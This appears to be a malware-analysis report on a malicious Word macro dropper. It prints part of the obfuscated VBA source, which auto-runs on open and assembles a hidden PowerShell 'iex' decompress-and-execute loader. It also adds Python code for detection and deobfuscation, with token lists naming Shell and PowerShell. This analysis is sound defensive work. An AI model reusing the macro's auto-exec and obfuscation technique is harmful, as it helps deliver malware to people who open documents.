Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The sample is a malicious Office document containing VBA macros. Its 'Document_Open' event handler runs automatically when the document is opened and reaches a 'Shell()' call, so the macro launches an external command rather than staying inside Office. The analyzer's string reconstruction recovered 'powershell -enc ', i.e. PowerShell with an encoded command line. The extracted source shows how that command is hidden: it is assembled one or two characters at a time from string literals interleaved with never-assigned variables (which evaluate to empty strings, with 'On Error Resume Next' swallowing the errors raised by the surrounding junk arithmetic). The visible fragments include '$pShomE[21]+$pSHOME[30]+'X'', which spells 'iex' from the default $PSHOME path ('C:\Windows\System32\WindowsPowerShell\v1.0', index 21 is 'i' and index 30 is 'e'), followed by 'New-Object System.IO.StreamReader((New-Object IO.Compression.DeflateStream(', an in-memory decompress-and-invoke chain. The primary purpose is execution of a second-stage payload.
Heuristics (6)
- ClamAV: Doc.Dropper.Agent-6605137-0 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6605137-0
- VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA [critical] (OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro [high] (OLE_VBA_DOCOPEN): Document_Open macro, an auto-execution entry point that fires when the document is opened
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents (for example VBA stomping, where the source stream is blanked but the compiled p-code still runs) where visible source is unavailable.
- Embedded URL [info] (EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace URI carried by ordinary Office content; it is not a network indicator and should not be treated as a C2 address.
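The p-code heuristic above fires when an auto-execution token and an execution or download token co-occur in a compiled VBA stream. The following Python is an added example of that co-occurrence check, not the analyzer's own rule: the token lists are this example's assumption, it expects the stream to be decompressed already (module source in OLE files is MS-OVBA compressed, which olevba handles), and it scans raw bytes for both ASCII and UTF-16LE spellings so a module whose source text has been stomped is still classified as long as the identifier names survive in the stream. The three inputs are constructed, not taken from this sample.

```python
import re

# Token classes for the auto-exec + execution co-occurrence rule. These lists
# are this example's assumption, not the analyzer's rule definitions.
AUTOEXEC_TOKENS = ("Document_Open", "Document_Close", "AutoOpen", "Auto_Open",
                   "AutoClose", "AutoExec", "Workbook_Open")
EXEC_TOKENS = ("Shell", "CreateObject", "WScript.Shell", "Win32_Process",
               "powershell", "cmd.exe")
DOWNLOAD_TOKENS = ("URLDownloadToFile", "XMLHTTP", "WinHttpRequest", "InternetOpenUrl")


def _present(blob, token):
    """True if the token occurs in blob as ASCII or UTF-16LE, ignoring case.
    No word boundaries on purpose: identifiers inside a compiled stream are
    not delimited the way source text is."""
    for enc in ("ascii", "utf-16-le"):
        if re.search(re.escape(token.encode(enc)), blob, re.IGNORECASE):
            return True
    return False


def scan_vba_stream(blob):
    """Classify one raw (already decompressed) module or cache stream.
    Returns the matched tokens per class and whether the rule fires."""
    result = {
        "autoexec": [t for t in AUTOEXEC_TOKENS if _present(blob, t)],
        "exec": [t for t in EXEC_TOKENS if _present(blob, t)],
        "download": [t for t in DOWNLOAD_TOKENS if _present(blob, t)],
    }
    result["fires"] = bool(result["autoexec"]) and bool(result["exec"] or result["download"])
    return result


# Constructed inputs (not taken from the sample on this page).
# 1. Plain source: an auto-exec handler that reaches Shell().
SOURCE_STREAM = (b"Private Sub Document_open()\r\n"
                 b"On Error Resume Next\r\n"
                 b"r = Shell(\"powershell -w hidden -enc AAAA\", 0)\r\n"
                 b"End Sub\r\n")
# 2. Stomped module: the source text is gone, but identifier names survive in
#    the p-code/cache area amid binary data (simulated here with junk bytes).
STOMPED_STREAM = (b"\x01\x00\x23\x01" + "Document_Open".encode("utf-16-le")
                  + b"\x00\x1a\x03CreateObject\x00\x7fWScript.Shell\x00\x00")
# 3. Benign: auto-exec handler with no execution or download token.
BENIGN_STREAM = b"Sub Document_Open()\r\nMsgBox \"Welcome\"\r\nEnd Sub\r\n"

if __name__ == "__main__":
    for name, blob in (("source", SOURCE_STREAM), ("stomped", STOMPED_STREAM),
                       ("benign", BENIGN_STREAM)):
        print(name, scan_vba_stream(blob))
```

Only the first and second inputs fire; the benign document has the auto-exec entry point but nothing in the execution or download classes, which is exactly the co-occurrence the rule requires before it raises a finding.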
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16462 bytes | d275d516874d64cb83a8a35340dc65e904a330617dd3f3b79807c5422967ccac |

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "twXuCzKNHDvWXH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
dRIBMb = 59401 + HjLciH / 70690 + UTqsc + vMRFA + usHNIZ + (ZjqIw + zoqTZo / 82100 / OAjhGK)
GClGB = 45307 + QZSVF / 69267 + cVWXp + hqRCs + RuCXzR + (pdIHX + TvMAl / 45606 / hDWLVA)
hQliNL = 12492 + OBSEn / 89740 + TOzOVN + pfiFI + YrBzb + (HNXYJ + NnzwTT / 98143 / bCwVmU)
HArYUiQFkabw ("" + kGbsiPYzTEkLsd + zcZEtsRKwjsYj + iDnjI + uozddqbTam + kiPDOnkZaw + FDIDtiXATcO + wpqRIaXqM)
WlWuf = 25608 + uvlSU / 1617 + UEawzq + zMGHfU + Eokss + (hHMdU + VUqdd / 39357 / WoVwsM)
WZPmz = 85325 + pHBZcz / 25073 + szdtU + Ijcnq + XjssfY + (KiwqUN + ijcDsq / 18980 / dzOSzF)
End Sub
Attribute VB_Name = "mzJuXGPIuDTCd"
Function iDnjI()
On Error Resume Next
JUYom = FQSJo * wqvmfn * (16540 - HrsPz) * aOGli / PWkOb
Wudzm = VuFwA * jBbnu * (20850 - Qjpqj) * DTlBs / vFoVi
imPjVC = vjvzP * vfmfhE * (88823 - izksNv) * Drfzw / jYBAT
YSEFOH = "pow" + pokirXz + mWMKhPRcIoUi + "e" + hiaKZGjL + DRTGJYcSGcUP + "r" + iHSmSHm + dDEQMZMEamjHQw + "s" + kLBbOpSMX + ottbujSpC + "h" + QsuXuclw + HUhvkvjo + "e" + tkHYKjLlazGIM + JjqvpabKHjZLfJ + "ll" + BRNOflVNNRAV + zHFAbOt + " " + RRZzrlUfcpPFrw + XLdiYaFqC + " " + GfhWpJVww + dbslYfEzHIsl + ". " + PKWqMjz + OAuTZwVBQ + "("
hBpmBZ = 72956 / ZJOud * ZzwFk / nTIdl - MiDmHb * RWOUkp
tkKAFQ = 1157 / zXvfm * NsLBXN / AnCmS - wLiOQ * Zujwdf
RjPUOfqFnR = " $p" + GPLwoSIVIiR + tzIOnDEoSIfhN + "Sho" + uiVKBcuYrqd + pWfzZjAmqPsJH + "m" + GfObNibaNGXOz + YJJQzwcfH + "E" + sDTdAtm + LbCjJOwSs + "[" + BNZqiArqrd + zKmXGkGi + "21]" + HFwGdHlAKnGJC + cuACwOnKUFW + Chr(43) + "$p" + pilWtIGTucWjF + NAoHHtipGc + "SH" + TucBHkuKbBj + YKiSdSqWTzUROO + "OM" + sfuNdmYR + wKhsMQYMj + "E[3" + XdJoHzzHksVwzi + BRllQrNTfpblD + "0" + fMPVBkY + bJqWdMhJqbWvz + "]" + Chr(43) + jPqJSXLErqq + NTEcvwJGAqqT + "'"
ucVGi = 27109 / pmuPDP * Fzjmb / vWWuAz - ZfYAqJ * QbVkI
YhKNr = 67018 / ABKDrL * YFbGi / KKNuZ - Jzddvi * vXpMh
JulBfsTQj = "X" + YdOwwwjsWtiZwq + QnzYuWXPYo + "') " + jtuzSimjzzbvaG + RFFFJUwtKrAB + "( N" + XJikJdzjGUEhUS + woPnzTi + "E" + OwAmbdkaAaRMp + kkzlAcAihIt + "W-" + SBEbYwvjwufq + UsupIqkD + "o" + wJMNSSihRw + VqotBzlqTvjVfl + "bJ" + kVBOokiOj + fPzYVwVWE + "eC" + pnRWABcqi + KzvztKlLZJU + "t" + aVWLXKP + VjOzSjcms + " " + AFAdYELlsbFU + vffRTYQw + "S" + PjvsBinQUCF + tnSziqrPLK + "Ys" + EzVZbQEMYN + TjJoozBF + "te" + ldBZmFBM + JVzlSrtlAJ + "M" + wJjvjDbLJjz + rXBizLLK + ".io" + zmYVwFPEQMGfrt + wlrOcXCZbT + "." + BzlUhJiJ + iFuchhFLjIma + "STR"
SCXajz = (cOHDSb - whLiRR / lUAqV + PnjUb + (71240 + CfmHZ - 15756 - BrmYOG))
wzEJv = (jhXkN - fpinbh / jSvDI + iFthb + (52892 + ABplP - 34621 - qVzOXM))
tAitIBTtUqM = "e" + MzzhpjuC + AROmAwIwidztXJ + "a" + OVhfvfXshi + ZRGmrTRYcizRPN + "m" + MTcnpPUZVOA + WFRSOYMWNCDsTz + "r" + PQihtfNGqE + jQcSwiFcfzAolH + "e" + YvVRoCGzS + qsLcKOQ + "A" + ZlvpsDsPQtwljw + isHiKiAJdPkTXq + "de" + SDrnzfZkKq + qPJvijbVIK + "R" + klLcTYsZSaTdFu + TXUTzbT + "((N" + opqPFMH + COTwQlzHGPvjpj + "EW" + ClqRzJSzXi + KNOLMJr + "-ob" + WGjWqVDSYzFG + bRzztvW + "J" + CvwsBkUjrCpf + vHoPiwfd + "eCt" + KmtMKwlMwU + tcBiESNDBXw + " " + sFjsbGY + iOqHWtRciKZ + "IO." + LNwtMPsSm + JRtFUVNIbQtn + "cOm" + wUmZpmkiitTvhu + KwYHwEAL + "p"
zRtzS = (EzQvGs - Ewanzl / oTAUF + OkzrUa + (32418 + oTphas - 82807 - dNzRwU))
HsDZDZvqJJ = "r" + AZjYdRZrV + zYbjcVPflG + "e" + hEpnUnwucZaUA + LCPpFhW + "ss" + mTpcEcn + jBUoiEDWQra + "iO" + juSDdVQT + UkBBwVpz + "n.d" + sTfjXXLmj + KHfnuKAzStI + "E" + ADdCFAasnhOMP + FJijufJcVODL + "fLa" + UWkzojT + hjqmWaRa + "tes" + UtIPYbLqaHo + lrTLdOazNKAwA + "tRE" + nCEnXjUGLGMWc + nUfuEvCPnMFbG + "a" + SYXSDYCB + RkIERrz + "m" + XjRGzzknQb + OYDnnzJp + "( " + SBonKuKWUHUk + BRXVSklaLwC + "[s" + QdsnRBm + RMmqduGKm + "yS" + cmWboXjzs + kwpttbTCjYNlz + "T"
bHrTAL = (zciHQ - uRnVZc / oBjBiq
... (truncated)
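The preview above builds its PowerShell command from string literals and Chr() calls separated by identifiers that are never assigned, and then uses '$pshome[N]' indexing to spell 'iex' without writing it. As an added example, not part of the analyzer's report or of the sample, the Python below reconstructs such a command: it treats bare identifiers as empty strings (an unassigned Variant in a module without Option Explicit is Empty), evaluates the literals and Chr() calls in source order, and resolves '$pshome[N]' against the default $PSHOME path. The PSHOME constant, the helper names and the SAMPLE input (shortened lines modelled on the preview, not the sample's own text) are this example's assumptions.

```python
import re

# Default $PSHOME on a 64-bit Windows install (assumption of this example). The
# SysWOW64 variant has the same prefix length, so indexes 21 and 30 still
# yield 'i' and 'e'.
PSHOME = r"C:\Windows\System32\WindowsPowerShell\v1.0"

# A string literal (VBA doubles embedded quotes) or a Chr()/ChrW()/Chr$() call.
_LITERAL = re.compile(r'"((?:[^"]|"")*)"|Chr[W$]?\((\d+)\)', re.IGNORECASE)
_ASSIGN = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')


def eval_concat(rhs):
    """Evaluate a concatenation of literals, Chr() calls and bare identifiers.
    Bare identifiers contribute nothing: a never-assigned name is an Empty
    Variant and concatenates as ""."""
    parts = []
    for m in _LITERAL.finditer(rhs):
        if m.group(2) is not None:
            parts.append(chr(int(m.group(2))))
        else:
            parts.append(m.group(1).replace('""', '"'))
    return "".join(parts)


def extract_strings(vba_source):
    """Return (variable, value) for each assignment whose right-hand side
    builds a string, in source order. The numeric junk lines carry no literal
    and are skipped; Attribute lines are metadata, not code."""
    out = []
    for line in vba_source.splitlines():
        if line.lstrip().startswith("Attribute "):
            continue
        m = _ASSIGN.match(line)
        if m and _LITERAL.search(m.group(2)):
            out.append((m.group(1), eval_concat(m.group(2))))
    return out


def resolve_pshome(cmd):
    """Replace $pshome[N] with the quoted character at that index of PSHOME and
    fold adjacent quoted fragments, so 'i'+'e'+'X' becomes 'ieX'."""
    def pick(m):
        i = int(m.group(1))
        return "'" + PSHOME[i] + "'" if i < len(PSHOME) else m.group(0)
    cmd = re.sub(r"\$pshome\[(\d+)\]", pick, cmd, flags=re.IGNORECASE)
    fold = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
    while True:
        cmd, n = fold.subn(r"'\1\2'", cmd)
        if n == 0:
            return cmd


def reconstruct(vba_source):
    """Join the decoded fragments in source order (the assembly order used by
    the sample) and resolve the $PSHOME index trick."""
    return resolve_pshome("".join(v for _, v in extract_strings(vba_source)))


# Constructed input modelled on the preview (shortened; not the sample itself).
SAMPLE = '''Attribute VB_Name = "mzJuXGPIuDTCd"
Private Sub Document_open()
On Error Resume Next
dRIBMb = 59401 + HjLciH / 70690 + UTqsc
YSEFOH = "pow" + pokirXz + "e" + hiaKZGjL + "r" + "s" + "h" + "e" + "ll" + " " + ". " + "("
hBpmBZ = 72956 / ZJOud * ZzwFk
RjPUOfqFnR = " $p" + tzIOnDEoSIfhN + "Sho" + "m" + "E" + "[" + "21]" + Chr(43) + "$p" + "SH" + "OM" + "E[3" + "0" + "]" + Chr(43) + "'"
JulBfsTQj = "X" + QnzYuWXPYo + "') " + "( N" + "E" + "W-" + "o" + "bJ" + "eC" + "t" + " " + "S" + "Ys" + "te" + "M" + ".io" + "." + "STR"
tAitIBTtUqM = "e" + "a" + "m" + "r" + "e" + "A" + "de" + "R" + "((N" + "EW" + "-ob" + "J" + "eCt" + " " + "IO." + "cOm" + "p"
End Sub
'''

if __name__ == "__main__":
    for var, val in extract_strings(SAMPLE):
        print(f"{var:12s} -> {val!r}")
    print(reconstruct(SAMPLE))
```

Running it on the constructed input yields a command that begins with `powershell . ( 'ieX') ( NEW-obJeCt SYsteM.io.STReamreAdeR((NEW-obJeCt IO.cOmp`, which is the `. ('iex') (New-Object System.IO.StreamReader((New-Object IO.Compression.DeflateStream(...` loader the analyzer's fragments point at. On the full extracted macros.bas the same approach applies, with the caveat that fragments built inside other functions must be joined in the order the call site consumes them rather than strictly by line.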